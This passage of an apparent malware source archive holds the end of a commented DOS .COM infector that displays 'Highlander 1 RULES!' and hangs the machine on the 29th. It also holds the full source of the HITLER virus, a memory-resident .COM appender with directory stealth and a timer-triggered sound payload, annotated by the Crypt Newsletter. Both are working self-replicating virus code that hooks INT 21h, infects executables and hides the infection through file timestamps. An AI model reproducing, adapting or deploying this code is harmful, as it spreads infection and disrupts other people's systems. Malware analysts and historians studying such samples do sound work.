;as the seventh letter will be infected). If there is no 'D' as the seventh
;letter, the virus then checks to see if the program to be executed is a
;COM file or not. If it is not a COM file, it is not infected and allowed
;to execute normally. If the COM file test is passed, the file size is then
;checked. Files are only infected if they are larger than 1024 bytes and
;smaller than 62000 bytes. If the file size is within bounds, the file
;is checked to see if it is already infected. Files are only infected
;a single time. The virus determines infection by checking the date/time
;stamp of the file. If the seconds portion of the stamp is equal to 40,
;the file is assumed to be infected. If the file is infected, the virus
;then checks the date. If it is the 29th day of any month, the virus will
;then display its irritating qualities by displaying the message
;'Highlander 1 RULES!' 21 times and then locking the machine and forcing
;a reboot. If the file is not infected, infection will proceed. The
;virus stores the original attributes and then changes the attributes to
;normal, read/write. The file length is also stored. The file is then
;opened and the first part of the file is read and stored in memory (the
;exact number of bytes is the same length as the virus). The virus then
;proceeds to overwrite the first part of the file with its own code. The
;file pointer is then adjusted to the end of the file and a short
;restoration routine is copied. The original first part of the file is
;then copied to the end of the file after the restore routine. The files
;time/date stamp is then adjusted to show an infection (the seconds portion
;of the time is set to 40. This will normally never be noticed since
;directory listings never show the seconds portion). The file is then
;closed and the original attributes are restored. Control is then passed
;to the original INT 021h routine and the now infected program is allowed
;to execute normally.
;This virus will infect read-only files.
;COMMAND.COM will not be infected.
;It is not destructive but can be highly irritating.
.model tiny
.code
IDEAL
begin:
jmp checkinfect ;jump over data to virus code
data1:
dw offset endcode+0100h ;address of restore routine
typekill:
db 01ah ;kills the DOS 'type' command
version:
db 'v05' ;virus version number
data2:
dw 0,080h,0,05ch,0,06ch,0 ;environment string for shell process
data3:
db 'COM' ;COM file check
data4:
db 0,0,1,0 ;data preceeding filename in environment
data5:
db 'Highlander 1 RULES! $' ;irritating message
restcode: ;restoration routine to restore host
rep movsb ;move host code back to original loc
push cs ;setup to transfer control to 0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;transfer control to 0100h and allow host
;to execute normally
checkinfect: ;check to see if virus already resident
mov ax,0de00h ;unsupported subfunction
int 21h
cmp ah,0deh ;is it unchanged?
je continfect ;yes, continue going resident
;no, already resident, restore host
restorehost: ;setup for restore routine
mov di,0100h ;destination of bytes to be moved
mov si,[word data1+0100h] ;address of restore routine
;(original host)
push cs ;setup for xfer to restore routine
push si
add si,checkinfect-restcode ;source of bytes to be moved
mov cx,endcode-begin ;number of bytes to move
ret ;xfer to restore routine
continfect: ;continue infection
mov ax,3521h ;set ax to get INT 21 vector address
int 21h ;get INT 21 vector
mov [WORD int21trap+1+0100h],bx
;store address in viral code
mov [WORD int21trap+3+0100h],es
;store segment in viral code
mov dx,offset start+0100h ;set dx to start of viral code
mov ax,2521h ;set ax to change INT 21 vector
int 21h ;change INT 21 to point to virus
mov [word data2+0100h+4],ds ;copy current segment to env string
mov [word data2+0100h+8],ds ;for shell process
mov [word data2+0100h+12],ds
push ds ;restore es to current segment
pop es
mov bx,offset endcode+0100h ;set bx to end of viral code
mov cl,04 ;divide by 16
shr bx,cl
inc bx ;INC by 1 just in case. bx is number of
;paragraphs of memory to reserve
mov ah,04ah ;set ah to release memory
int 21h ;release all excess memory
mov ds,[word 02ch] ;get segment of environment copy
xor si,si ;zero si
cld ;clear direction flag
tryagain:
mov di,offset data4+0100h ;point to data preceeding filename
mov cx,4 ;data is 4 bytes long
repe cmpsb ;check for match
jne tryagain ;if no match, try again
mov dx,si ;filename found. set dx to point
mov bx,offset data2+0100h ;set bx to point to environment string
mov ax,04bffh ;set ax to shell and execute. AL contains
;an invalid value which will be interpreted
;by the virus (int 21 is now trapped by it)
;and changed to 00.
cld ;clear direction flag
int 21h ;shell and re-execute the host program
mov dx,(endcode-begin)*2+0110h
;set dx to end of virus *2 plus 10. This
;will point to the end of the resident
;portion of the virus
int 27h ;terminate and stay resident
start: ;start of virus. The trapped INT 21 points
;to this location.
pushf ;store the flags
cmp ah,0deh ;is calling program checking for infection?
jne check4run ;no, continue on checking for execution
mov ah,0edh ;yes, change ah to 0edh
jmp cont ;jump over rest of viral code
check4run:
cmp ah,04bh ;check for program attempting to execute
je nextcheck ;yes, continue checks
jmp cont ;no, jump over rest of virus
nextcheck:
cmp al,0ffh ;check if virus is shelling. 0ffh will
;normally never be used and is used by
;the virus to shell the host before it is
;fully resident. This prevents the virus
;from shelling twice, which will work but
;lose the environment and cause problems.
jne workvirus ;normal DOS shell. Jump to virus meat.
xor al,al ;virus is shelling. zero al.
jmp cont ;jump over rest of virus
workvirus:
push ax ;store all registers subject to change
push bx
push cx
push es
push si
push di
push dx
push ds
push cs ;store the code segment so it can be used
push cs ;to set the ds and es registers
pop ds ;set ds to same as cs
pop es ;set es to same as cs
mov dx,080h ;set dx to offset 080h
mov ah,01ah ;set ah to create DTA
int 21h ;create DTA at 080h (normal DTA area)
pop ds ;set ds to original ds
pop dx ;set dx to original dx (ds:dx is used to
;point to the path and filename of the
;program to be executed)
push dx ;store these values back
push ds
xor cx,cx ;zero cx
mov ah,04eh ;set ah to search for filename match
int 21h ;search for filename (this is primarily
;done to setup data in the DTA so that it
;can be checked easier than making a
;number of individual calls)
push es ;store es (same as cs)
pop ds ;set ds to same as es and cs
cmp [byte 087h],'D' ;check for 'D' as seventh letter in file
jne j5
jmp endvirus ;if 'D' is 7th letter, dont infect
j5:
mov si,offset data3+0100h ;set source of bytes to compare
mov di,089h ;set destination of bytes to compare
mov cx,3 ;number of bytes to compare
cld ;compare forward
repe cmpsb ;compare bytes (check to see if file's
;extension is COM)
je j1
jmp endvirus ;not a COM file. Dont infect
j1:
mov bx,[word 009ah] ;set bx to length of file
cmp bx,1024 ;is length > 1024?
jae j2 ;yes, continue with checks
jmp endvirus ;no, dont infect
j2:
cmp bx,62000 ;is length < 62000?
jbe j3 ;yes, continue with checks
jmp endvirus ;no, dont infect
j3:
mov ax,[word 096h] ;set ax to file's time stamp
and ax,0000000000011111b ;clear everything but seconds
cmp ax,0000000000010100b ;is seconds = 40?
jne j4 ;yes, continue with infection
mov ah,02ah ;no, set ah to get the date
int 21h ;get current system date
mov cx,21 ;set cx to 21
cmp dl,29 ;is the date the 29th?
je irritate ;yes, continue with irritate
jmp endvirus ;no, let program execute normally
irritate:
mov dx,offset data5+0100h ;point dx to irritating message
mov ah,09h ;set ah to write to screen
int 21h ;write message 21 times
loop irritate
iret ;xfer program control to whatever's on
;the stack (this almost guarantee's a
;lockup and a reboot)
j4:
mov ax,[word 096h] ;set ax equal to the file's time stamp
and ax,1111111111100000b ;zero the seconds portion
or ax,0000000000010100b ;set the seconds = 40
add bx,0100h ;set bx = loc for restore routine (end
;of file once its in memory)
mov [word data1+0100h],bx ;store this value in the virus
mov bx,ax ;set bx = to adjusted time stamp
pop ds ;get the original ds
push ds ;store this value back
mov ax,04300h ;set ax to get the file's attributes
;ds:dx already points to path/filename
int 21h ;get the files attributes
push cx ;push the attributes
push bx ;push the adjusted time stamp
xor cx,cx ;zero cx(attributes for normal, read/write)
mov ax,04301h ;set ax to set file attributes
int 21h ;set files attributes to normal/read/write
mov ax,03d02h ;set ax to open file
int 21h ;open file for read/write access
mov bx,ax ;mov file handle to bx
push cs ;push current code segment
pop ds ;and pop into ds (ds=cs)
mov cx,endcode-begin ;set cx equal to length of virus
mov dx,offset endcode+0100h ;point dx to end of virus in memory
mov ah,03fh ;set ah to read from file
int 21h ;read bytes from beginning of file and
;store at end of virus. Read as many bytes
;as virus is long.
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04200h ;set ax to move file pointer from begin
int 21h ;mov file pointer to start of file
mov cx,endcode-begin ;set cx = length of virus
mov dx,0100h ;point dx to start of virus
mov ah,040h ;set ah to write to file
int 21h ;write virus to start of file
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04202h ;set ax to move file pointer from end
int 21h ;mov file pointer to end of file
mov cx,checkinfect-restcode ;set cx to length of restore routine
mov dx,offset restcode+0100h ;point dx to start of restore routine
mov ah,040h ;set ah to write to file
int 21h ;write restore routine to end of file
mov cx,endcode-begin ;set cx to length of virus (length of code
;read from beginning of file)
mov dx,offset endcode+0100h ;point dx to data read from file
mov ah,040h ;set ah to write to file
int 21h ;write data read from start of file to end
;of file following restore routine
pop cx ;pop the adjusted time stamp
mov dx,[word 098h] ;mov the file date stamp into dx
mov ax,05701h ;set ax to write time/date stamp
int 21h ;write time/date stamp to file
mov ah,03eh ;set ah to close file
int 21h ;close the file
pop cx ;pop the original attributes
pop ds ;pop the original ds
pop dx ;pop the original dx
push dx ;push these values back
push ds
mov ax,04301h ;set ax to set file attributes (ds:dx now
;points to original path/filename)
int 21h ;set the original attributes back to file
endvirus: ;virus execution complete. restore original
;values for INT 21 function
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
cont: ;virus complete. restore original flags
popf
pushf
int21trap: ;this calls the original INT 21 routine
db 09ah ;opcode for a far call
nop ;blank area. the original INT 21 vector
nop ;is copied to this area
nop
nop
push ax ;after the original INT 21 routine has
;completed execution, control is returned
;to this point
push bx
pushf ;push the flags returned from the INT 21
;routine. We have to get them in the
;proper location in the stack when we
;return to the calling program
pop ax ;pop the flags
mov bx,sp ;set bx equal to the stack pointer
mov [word ss:bx+8],ax ;copy the flags to the proper location in
;the stack
pop bx ;restore bx
pop ax ;restore ax
iret ;return to calling program
signature:
db 'dex'
endcode: ;this file has been written as if it were
;a natural infection. At this point the
;virus is ended and we are at the restore
;routine. Following this is the host code
;which will be moved back to 0100h. This
;file could never actually be a natural
;infection however due to its small size
rep movsb ;start of restore routine. move host back
push cs ;set up to xfer to cs:0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;host is restored. xfer to start of host
hoststart: ;This is the host program. It consists
;merely of a simple message being displayed
jmp skipdata ;jump over message
hostmessage:
db 'The virus is now resident.$'
skipdata:
mov ah,09h ;set ah to write to screen
mov dx,offset hostmessage+0100h
;point dx to message to display
int 21h ;display message
mov ah,04ch ;set ah to terminate program
int 21h ;terminate program, return to DOS
END
MSDOS/H-Index/Virus.MSDOS.Unknown.hitler.a86
+718
View File
@@ -0,0 +1,718 @@
;The HITLER virus: commented in a rough 'n' ready way by the
;Crypt Newsletter staff for issue #11, January 1993.
;The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.
call rakett ; recalculate offset
old db 'Í !­' ; virus identification marker
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh ; check if virus installed
int 21h
jnc failed ; exit if here
cli
mov ax,3521h
int 21h ; get interrupt vector
mov w [bp+offset old21],bx ; es:bx points to
mov w [bp+offset old21+2],es ; interrupt handler
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx ; access timer tick int.
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380 ; stuff our value into
sti ; "teller" buffer for
; later
call normalspeed ; eh?
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21 ; set int 21 route through virus
int 21h
mov al,1Ch
mov dx,offset ni1C ; revector timer tick through
int 21h ; virus
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret ; exit to host
findFCB: popf
call int21 ; look to virus "stealth"
pushf ; routine, now that int 21
or al,al ; comes through virus
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax ; the following essentially massages the
push bx ; file control block on directory scans,
push dx ; subtracting the virus size from infected
push es ; files before the user sees 'em
mov ah,2Fh ; get disk transfer address
call int21 ;
cmp byte es:[bx],0FFh ; failed?
jne normFCB ; no, everything still OK
add bx,8
normFCB: mov al,byte es:[bx+16h] ; retrieve seconds attribute
and al,31 ; from observed file, if it's
xor al,31 ; 31, the file is infected
jnz shitFCB ; not 31 - file not infected
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size ; subtract virus length from
sbb dx,0 ; infected file
jc shitFCB ; no files? exit
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB: ; restore everything as normal
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h ; any user access of the file control
je findFCB ; block must come through virus
cmp ah,12h ; ditto for here
je findFCB
cmp ax,42ABh ;
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h ; is a program being loaded?
jne not_4B00 ; exit if not
call install_24 ; install critical error handler
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h ; get file attributes of potential host
call int21
jc back1 ; failed? exit
mov cs:old_attr,cx ; stash attributes here
test cl,4 ; is the potential host a system file?
jnz back1 ; yes? so exit
mov ax,4301h ; set new file attributes, read or write
xor cx,cx
call int21
jc back1 ; error? exit
push dx
push ds
call infect ; begin infection stuff
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24 ; normalize critical error handler
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h ; open host file with read/write access
call int21
jnc okay_open
bad1: ret ; was there an error? exit
okay_open: xchg bx,ax
mov ax,5700h ; get file date and file time
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh ; read first five bytes from potential host
mov cx,5
mov dx,offset old ; store them here
push cs
pop ds
call int21
jc close ; error, exit?
cmp al,5 ; get the five bytes?
jne close ; no, so exit
cmp word old[0],'MZ' ; is this an .EXE file?
je close ; yes, so go away
cmp word old[0],'ZM' ; double-check, is this an .EXE file?
je close ; yes, so go away
cmp old[0],0E9h ; does it start with a jump?
jne infect1 ; no - infect!
cmp word old[3],'­!' ; does it start with the HITLER virus
jne infect1 ; marker? If no, infect!
; (Boy, this fellow is careful!)
close: pop dx
pop cx
mov ax,5701h ; reset file date and time
call int21
mov ah,3Eh ; close file
call int21
ret
infect1: mov ax,4202h ; reset pointer to end of file
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000 ; compare .COMfile size to 59,000 bytes
jae close ; greater than or equal? close file
; HITLER is a big virus, so we don't want to
dec ax ; exceed the DOS execution boundary for .COM
dec ax ; files
dec ax
mov word ptr putjmp[1],ax
mov ah,40h ; write HITLER to the target file
mov cx,size ; length in CX
mov dx,100h
call int21
jc close
cmp ax,size ; again, we're being real careful
jne close ; not to infect ourself
mov ax,4200h ; set file pointer to beginning of host
xor cx,cx
xor dx,dx
call int21
mov ah,40h ; write the first five bytes of the
mov cx,5 ; viral jump and ID strings to the
mov dx,offset putjmp ; beginning of the host file
call int21
or byte ss:[bp],31 ; set the seconds field to 31, so the
; "stealth" routine has its cue
jmp close ; close the file and clean up
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf ; installation of critical error
cli ; handler (no shit, Sherlock!)
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf ; remove it
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0 ; ID note by Dreamer of Demoralized
; Youth
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380 ; "new" timer tick values for viral
; trigger
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
; -lobotomize code from here to marker to get HITLER at start
cmp teller,0 ; compare 0 with the value the virus
je teller_ok ; stuffed into the timer tick interrupt
dec teller ; if equal - do "HITLER!" thing, if not
jmp noreset ; decrement the value
; -bottom of lobotomy marker
teller_ok: ; sound routine to the IBM internal speaker
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample ; points to the huge table at
jb noreset ; the end of the virus, a
mov xofs,offset sample ; .VOC sample of some nut
noreset: ; shouting "HITLER!"
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
